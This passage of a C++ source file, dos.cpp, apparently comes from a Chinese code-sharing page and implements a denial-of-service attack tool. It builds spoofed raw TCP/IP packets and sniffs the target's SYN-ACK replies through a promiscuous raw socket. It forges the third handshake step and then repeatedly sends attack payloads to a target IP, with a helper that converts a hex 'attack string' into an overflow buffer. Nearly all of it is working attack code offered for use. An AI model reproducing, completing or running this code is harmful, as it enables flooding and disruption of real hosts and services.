📄 dos.cpp
字号:
{
sendnum=0;
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else
{
printf(" Attack target from port %d \n", l);
}
}//end of while
Sleep(Interval);
}
pAtObj = pAtObj->Next;
}
return 0;
}
// 获取本地IP
DWORD GetLocalIP()
{
DWORD dwIP=0;
int i=0;
struct hostent* lp = NULL;
char HostName[255] = {0};
gethostname(HostName,255);
lp = gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
i++;
dwIP = *(DWORD*)lp->h_addr_list[--i];
return dwIP;
}
// 计算校验和
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
// 监听线程函数
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
SOCKET rawsock;
SOCKADDR_IN addr_in={0};
// 创建原始套接字
if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Sniffer Socket Setup Error!\n");
return false;
}
// 设置本地地址结构
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(8288);
addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
//对rawsock绑定本机IP和端口
int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
if(ret==SOCKET_ERROR)
{
printf("bind failed: %d\n",WSAGetLastError());
exit(0);
}
DWORD lpvBuffer = 1;
DWORD lpcbBytesReturned = 0;
// 设置原始套接字相关参数
WSAIoctl(rawsock, SIO_RCVALL,
&lpvBuffer, sizeof(lpvBuffer),
NULL, 0, &lpcbBytesReturned,
NULL, NULL);
while (TRUE)
{
SOCKADDR_IN from={0};
int size=sizeof(from);
char RecvBuf[256]={0};
//接收数据包
ret=recvfrom(rawsock,RecvBuf,
sizeof(RecvBuf),0,
(struct sockaddr*)&from,&size);
if(ret!=SOCKET_ERROR)
{
// 分析数据包
IPHEADER *lpIPheader;
lpIPheader=(IPHEADER *)RecvBuf;
// 判断数据包的类型是否是TCP和源地址是否与目标机IP一致
if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(TargetIP) )
{
TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf+sizeof(IPHEADER));
//判断是不是远程开放端口返回的数据包
if ( lpTCPheader->th_flag==0x12)
{
if ( lpTCPheader->th_ack == htonl(0x00198289) )
{//伪造第3次握手
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
//主动发出一次数据
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}
}
else
{
if ( lpTCPheader->th_flag == 0x10 )
//继续发送数据
SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,\
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}
}
}
} // end of while
}
// 发送数据包函数
void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[1024]={0};
// 设置地址结构
addr_in.sin_family=AF_INET;
addr_in.sin_port = APort;
addr_in.sin_addr.S_un.S_addr = AIP;
// 填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=AIP;
ipHeader.sourceIP = SIP;
tcpHeader.th_dport = APort;
tcpHeader.th_ack = ACK;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_seq= SEQ;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_sport=SPort;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)+dwSize);
if ( !Isdata)
{
tcpHeader.th_flag=0x10;
}// ack
else
{
tcpHeader.th_flag=0x18;
}
// 填充伪首部
tcpHeader.th_urp=0;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
if ( pBuf != NULL )
{
// 重新计算校验和
memcpy(szSendBuf+sizeof(psdHeader)+sizeof(tcpHeader),pBuf,dwSize);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,
sizeof(psdHeader)+sizeof(tcpHeader)+dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)dwSize);
}
else
{
// 重新计算校验和
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
}
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
int rect=0;
if ( pBuf == NULL ) // 发送伪造数据包
rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(tcpHeader), 0,
(struct sockaddr*)&addr_in, sizeof(addr_in));
else
{
memcpy(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), pBuf, dwSize);
rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(tcpHeader)+dwSize,
0, (struct sockaddr*)&addr_in, sizeof(addr_in));
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return;
}
else
{
if ( pBuf != NULL )
printf("SendData ok %d\n",ntohs(SPort));
else
printf(" SendAck ok %d\n",ntohs(SPort));
}
}
// 转换攻击字符串格式
void ConvertOpt (CHAR* pu)
{
int i=0 , lentemp;
lentemp = strlen(pu);
// 长度为输入的字符串的1/2
optlen = lentemp/2;
outflowbuf = (UCHAR*)malloc(optlen);
int k=0;
for ( i = 0 ; i < lentemp ; i+=2 )
{
BYTE tempb = 0;
tempb = pu[i+1];
// 如果ANSI码小于9则减去0x30,否则减去0x37
if ( tempb < '9')
tempb = tempb - 0x30;
else
{
tempb = tempb - 0x37;
}
outflowbuf[k] = tempb;
tempb = 0;
tempb = pu[i];
if ( tempb < '9')
tempb = tempb - 0x30;
else
{
tempb = tempb - 0x37;
}
// 移位操作
tempb= tempb<<4;
outflowbuf[k]+= tempb;
k++;
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -